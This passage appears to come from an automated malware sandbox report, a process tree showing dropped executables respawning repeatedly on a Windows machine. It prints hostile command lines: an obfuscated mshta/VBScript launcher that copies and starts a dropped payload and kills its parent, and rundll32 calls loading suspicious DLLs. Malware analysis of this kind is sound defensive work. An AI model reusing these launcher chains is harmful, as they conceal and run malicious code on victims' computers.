    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:14920
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:15712
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16276
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:15640
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:15068
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:14444
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:14248
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16220
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9292
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16836
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:17308
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16532
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16776
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:5332
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:4580
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16964
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:17268
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:17724
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18148
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18376
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:17872
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16048
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16748
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:9732
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:17908
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18232
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18692
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19056
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19432
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:15992
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19152
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19220
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18576
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19336
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:17924
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20056
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18460
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20072
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19760
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20068
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19740
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20360
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20264
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19736
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18244
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20084
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20764
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21032
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21344
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16484
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:17540
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21424
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:18804
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:15656
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20584
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19408
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:10664
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:14084
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12516
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21772
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22132
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22500
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:19948
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21972
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22240
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21528
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22164
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:6768
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22476
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21940
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21968
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22572
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22904
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23232
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23548
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22820
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23296
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23032
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21184
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22376
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22772
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23036
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23732
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24068
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24496
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23940
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24492
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:20504
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24204
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24772
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:25044
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:25384
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23672
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24296
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:25180
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24380
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:25476
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:12912
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24788
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:21140
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:22864
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26036
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26204
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26480
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:25796
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23800
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26408
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26196
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26400
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:16136
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26880
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:27200
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:27400
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:25424
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:23900
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:27452
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24812
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:25096
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:27012
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26836
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:4060
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:3284
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:27796
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:28056
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:28348
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26296
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:28264
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:28648
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:24984
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:27704
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:26328
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:27972
- - C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
    3⤵
    PID:28924
- C:\Users\Admin\Documents\CknMsDOOg56Q1tMXNCi7tOVJ.exe
  "C:\Users\Admin\Documents\CknMsDOOg56Q1tMXNCi7tOVJ.exe"
  2⤵
  - Executes dropped EXE
  PID:4720
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\CknMsDOOg56Q1tMXNCi7tOVJ.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\CknMsDOOg56Q1tMXNCi7tOVJ.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
    3⤵
    PID:6116
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\CknMsDOOg56Q1tMXNCi7tOVJ.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\CknMsDOOg56Q1tMXNCi7tOVJ.exe" ) do taskkill -F -im "%~NxQ"
      4⤵
      PID:2060
    - - C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE
        
        BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1
        5⤵
        
        PID:7196
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
        6⤵
        
        PID:8376
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"
        7⤵
        
        PID:9336
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
        6⤵
        
        PID:10232
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -im "CknMsDOOg56Q1tMXNCi7tOVJ.exe"
        5⤵
        Kills process with taskkill
        
        PID:7312

C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
1⤵
- Executes dropped EXE
PID:5144

C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
1⤵
- Executes dropped EXE
PID:5912

C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
1⤵
- Executes dropped EXE
PID:5596

C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
C:\Users\Admin\Documents\MEQBDkXhWRMl5RraOMNYu3oY.exe
1⤵
PID:3004

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:8164

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4672

